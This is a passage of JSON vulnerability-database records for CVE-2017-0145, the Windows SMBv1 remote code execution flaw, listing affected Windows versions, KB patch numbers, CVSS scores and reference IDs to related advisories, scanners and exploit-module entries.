"kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T16:54:11", "differentElements": ["msAffectedSoftware"], "edition": 17}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-06T18:45:07", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T18:45:07", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-06T18:45:07", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012598", "KB4012214", "KB3210720", "KB4012216", "KB4012212", "KBMS16-110, 3187754", "KB4013198", "KB4012213", "KB3205409", "KB3177186", "KB3212646", "KB3205401", "KB4012215", "KB3210721", "KB4014077", "KB4012217", "KB4012606", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T18:45:07", "differentElements": ["msAffectedSoftware"], "edition": 18}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-07T08:44:10", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-07T08:44:10", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-07T08:44:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012213", "KB4012215", "KB3212646", "KB4013198", "KB4012598", "KB3210720", "KB3210721", "KB4012214", "KB3205401", "KB4012606", "KB4014077", "KB4012216", "KB3213986", "KB3177186", "KB4012217", "KB4012212", "KBMS16-110, 3187754", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 